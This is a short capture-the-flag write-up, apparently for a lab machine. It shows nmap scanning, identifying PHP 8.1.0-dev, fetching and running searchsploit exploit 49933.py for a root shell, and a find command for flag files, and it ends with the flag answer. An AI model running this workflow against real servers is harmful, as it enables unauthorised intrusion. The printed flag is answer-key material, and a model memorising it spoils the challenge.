Skip to content

Latest commit

 

History

History
56 lines (34 loc) · 1.25 KB

File metadata and controls

56 lines (34 loc) · 1.25 KB

Something seems a little off with the server.

Scanning

scan the target

nmap -sS -sV -sC 10.10.151.122

image

HTTP

go to the webpage

image

we found a admin dardboard that contain a searchbar

Enumeration

just try a request, i found the version of php

image

quick search for cve

searchsploit php 8.1.0-dev

image

Exploitation

searchsploit -m 49933.py
python3 49933.py

image

wow amazing, we got root user

find / -name *flag*.txt 2>/dev/null

image

Flag user.txt
Answer flag{4127d0530abf16d6d23973e3df8dbecb}